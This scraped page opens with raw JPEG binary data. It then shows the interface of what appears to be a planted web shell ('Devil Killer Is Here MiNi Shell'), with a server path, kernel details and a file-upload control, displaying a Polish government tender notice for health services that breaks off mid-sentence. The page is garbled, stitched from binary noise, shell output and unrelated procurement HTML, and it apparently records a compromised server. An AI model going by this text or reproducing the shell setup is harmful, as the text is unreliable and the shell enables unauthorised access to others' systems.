JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220331/0010567301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie dodatkowego pakietu usług zdrowotnych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Komunikacji Elektronicznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017510794</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Giełdowa 7/9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@uke.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uke.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Łączność </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie dodatkowego pakietu usług zdrowotnych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-62b5f2b0-b0d0-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00105673</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-62b5f2b0-b0d0-11ec-80f8-1ad70aec7fa4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia i w konkursie, w tym składanie<br/>ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana<br/>informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy<br/>użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002<br/>r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywać się będzie drogą<br/>elektroniczną przy użyciu:<br/>a. E-zamówienia: https://ezamowienia.gov.pl/pl/<br/>b. poczty elektronicznej, e-mail: zamowienia.publiczne@uke.gov.pl<br/>Wszelkie dokumenty związane z prowadzonym postępowaniem zamieszczane<br/>będą na stronie Zamawiającego tj. https://bip.uke.gov.pl/zamowienia-publiczne/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.Wykonawca biorący udział w<br/>postępowaniu o udzielenie zamówienia publicznego musi<br/>posiadać konto na e-zamowieniach. Wykonawca posiadający konto na e-zamówieniach ma<br/>dostęp do zakładek Formularze do komunikacji oraz zakładki oferty/wnioski.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Instrukcjach interaktywnych zamieszczonych na e-zamówieniach.<br/>5. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta<br/>Wykonawcy i załączniki do oferty) odbywać się będzie elektronicznie za pośrednictwem dedykowanych<br/>formularzy dostępnych na e-zamówieniach lub za pomocą poczty elektronicznej, e-mail:<br/>zamowienia.publiczne@uke.gov.pl . Korespondencja przesłana za pomocą tych formularzy i poczty elektronicznej nie może być<br/>szyfrowana. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>6. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów W sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>7. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>8. Zamawiający nie ponosi odpowiedzialności z tytułu nieotrzymania przez Wykonawcę informacji<br/>związanych z prowadzonym postępowaniem w przypadku wskazania przez Wykonawcę w ofercie np.<br/>błędnego adresu poczty elektronicznej.<br/>9. Wykonawca może w formie elektronicznej zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie<br/>treści SWZ. Zamawiający niezwłocznie udzieli wyjaśnień jednak nie później niż 2 dni przed upływem<br/>terminu składania ofert – pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynie do<br/>Zamawiającego nie później niż na 4 dni przed upływem wyznaczonego terminu składania ofert i nie<br/>dotyczy udzielonych wyjaśnień.<br/>10. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania ww. wniosków.<br/>Jeżeli wniosek o wyjaśnienie treści SWZ wpłynął po upływie terminu, o którym mowa powyżej lub<br/>dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez<br/>rozpoznania.<br/>11. Wnioski o wyjaśnienie treści SWZ należy przesyłać za pomocą formularza do komunikacji<br/>zamieszczonych na e-zamówieniach lub za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia.publiczne@uke.gov.pl . W temacie korespondencji należy podać numer i nazwę<br/>postępowania. Treść wniosków wraz z wyjaśnieniami Zamawiający zamieści na stronie internetowej<br/>(https://bip.uke.gov.pl/zamowienia-publiczne/), bez ujawniania źródła wniosku.<br/>12. W szczególnie uzasadnionych przypadkach Zamawiający może w każdym czasie, przed upływem<br/>terminu składania ofert zmodyfikować treść niniejszej SWZ.<br/>13. Każda wprowadzona przez Zamawiającego zmiana stanie się częścią SWZ. Dokonaną zmianę<br/>treści SWZ Zamawiający udostępni na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Klauzula informacyjna z art. 13 RODO związana z<br/>niniejszym postępowaniem o udzielenie<br/>zamówienia publicznego<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 z<br/>późn. zm.), dalej „RODO”, Zamawiający informuje, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Prezes Urzędu Komunikacji<br/>Elektronicznej, adres siedziby: ul. Giełdowa 7/9, 01-211 Warszawa, numer telefonu: +48<br/>22 33 04 000, numer faksu: +48 22 53 49 162.<br/>2) Dane kontaktowe Inspektora ochrony danych osobowych w Urzędzie Komunikacji<br/>Elektronicznej: adres e-mail: iod@uke.gov.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego w trybie podstawowym bez negocjacji, pn. Świadczenie dodatkowego pakietu usług zdrowotnych–<br/>sprawa BA.WZP.26.17.2022.<br/>4) Podstawą przetwarzania danych osobowych jest ustawa Pzp.<br/>5) Odbiorcami danych osobowych są podmioty uprawnione na mocy obowiązujących<br/>przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada<br/>jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o<br/>których mowa w art. 9 ust. 1 RODO (szczególne kategorie danych osobowych).<br/>Ponadto dane osobowe mogą być udostępniane podmiotom upoważnionym do odbioru<br/>danych na podstawie odpowiednich przepisów prawa (np. organy administracji, sądy,<br/>służby państwowe), podmiotom, które przetwarzają dane osobowe w imieniu<br/>Zamawiającego na podstawie zawartej z nim umowy powierzenia przetwarzania danych<br/>osobowych (np. podmioty obsługujące systemy teleinformatyczne Zamawiającego), a<br/>także innym administratorom przetwarzającym dane we własnym imieniu (np. podmioty<br/>prowadzące działalność pocztową lub kurierską).<br/>6) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego, a w stosunku do<br/>danych osobowych wskazanych przez Wykonawcę, którego oferta została wybrana -<br/>przez okres trwania umowy o zamówienie, ale nie krócej niż 4 lata, od dnia zakończenia<br/>postępowania o udzielenie zamówienia publicznego oraz do czasu przedawnienia<br/>ewentualnych roszczeń wynikających z umowy. Ponadto dane osobowe będą przechowywane do<br/>celów archiwalnych przez okres przewidziany w przepisach kancelaryjno-archiwalnych<br/>Zamawiającego, przyjętych zgodnie z ustawą o narodowym zasobie archiwalnym i archiwach.<br/>7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA.WZP.26.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie dodatkowego pakietu usług zdrowotnych obejmujące:<br/>1. Konsultacje Specjalistyczne<br/>Wykonawca zapewnia konsultacje specjalistyczne, które obejmują poradę lekarza specjalisty <br/>wraz z czynnościami niezbędnymi do postawienia diagnozy, podjęcia właściwej decyzji <br/>terapeutycznej, monitorowania leczenia, wystawianie recept refundowanych na leki i <br/>materiały medyczne oraz wystawianie zaświadczeń ostanie zdrowia i niezdolności do pracy.<br/>2. Opieka lekarska nad przebiegiem ciąży oraz nad noworodkiem<br/>Opieka obejmuje opiekę wybranego lekarza specjalisty w tej dziedzinie, konieczne konsultacje <br/>z lekarzami specjalistami oraz położnymi, niezbędne badania diagnostyczne i laboratoryjne <br/>przewidziane w harmonogramie i karcie ciąży oraz czynne poradnictwo zdrowotne z zakresu <br/>fizjologii przebiegu ciąży i porodu oraz opieki nad noworodkiem.<br/>3. Zabiegi medyczne.<br/>4. Zabiegowa Opieka Pielęgniarska.<br/>5. Badania Laboratoryjne – skierowania od lekarzy Wykonawcy, lekarzy placówek <br/>współpracujących.<br/>6. Zabiegi Diagnostyczne – skierowania od lekarzy Wykonawcy i lekarzy placówek <br/>współpracujących.<br/>7. Badania Radiologiczne – skierowania od lekarzy Wykonawcy, lekarzy placówek <br/>współpracujących.<br/>8. NMR – Rezonans Magnetyczny – skierowania od lekarzy Wykonawcy i lekarzy placówek <br/>współpracujących.<br/>9. Badania USG – skierowania od lekarzy Wykonawcy, lekarzy placówek współpracujących.<br/>10. Badania endoskopowe – skierowania od lekarzy Wykonawcy i lekarzy placówek <br/>współpracujących.<br/>11. Badania czynnościowe – skierowania od lekarzy Wykonawcy i lekarzy placówek <br/>współpracujących.<br/>12. Rehabilitacja układu ruchu.<br/>13. Wizyty domowe lekarzy internistów i pediatrów na terenie Polski.<br/>14. Świadczenie usług pogotowia ratunkowego na terenie Polski.<br/>15.Świadczenie usług medycznych na terenie Polski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85100000-0 - Usługi ochrony zdrowia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121000-3 - Usługi medyczne</p> <p class="mb-0">85147000-1 - Usługi zdrowotne świadczone dla firm</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba placówek własnych Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba placówek będących w dyspozycji Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie zintegrowanego, elektronicznego systemu rejestracji wizyt lekarskich (m.in. możliwość rezerwacji wizyt on-line przez pacjenta, możliwość sprawdzenia dostępności do poszczególnych specjalistów, przypominanie drogą elektroniczną, np. sms-ami lub e-mailami o wizytach) dostępnego we wszystkich własnych placówkach Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie zintegrowanego, elektronicznego systemu obsługi dokumentacji pacjenta (m.in. historia chorób pacjenta, wykaz wszystkich konsultacji lekarskich, wykaz stosowanych lekarstw, wyniki badań laboratoryjnych i diagnostycznych, inne ważne informacje o pacjencie) dostępnego we wszystkich placówkach własnych Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie systemu hot-line w dyżurach 24h w celu umożliwienia konsultacji telefonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu:<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>a) złoży wydruk poświadczający posiadanie wpisu do rejestru <br/>podmiotów wykonujących działalność leczniczą, o którym mowa w <br/>ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (t.j. Dz.U. z 2021 r., poz. 711);<br/>4) Zdolności technicznej lub zawodowej:<br/>a) posiada wiedzę i doświadczenie niezbędne do realizacji przedmiotu zamówienia –<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży wykaz <br/>wykonanych, a w przypadku świadczeń okresowych lub ciągłych również <br/>wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/>okresie wykonał: <br/>co najmniej jedną usługę tożsamą z przedmiotem zamówienia (tj. polegające na <br/>świadczeniu usług dodatkowej opieki medycznej), o wartości co najmniej 300.000 zł brutto (słownie: trzysta tysięcy złotych); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076, 1086), z <br/>innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/>dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w <br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, <br/>sporządzonych nie wcześniej, niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w <br/>rozdziale 7 ust. 2 pkt 4 SWZ - wykazu usług (sporządzonego wg wzoru stanowiącego <br/>załącznik nr 6 do Formularza Oferty) wykonanych, a w przypadku świadczeń <br/>powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech <br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z <br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których <br/>usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów <br/>określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy <br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/>przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń <br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn <br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie <br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal <br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte <br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli <br/>Wykonawca 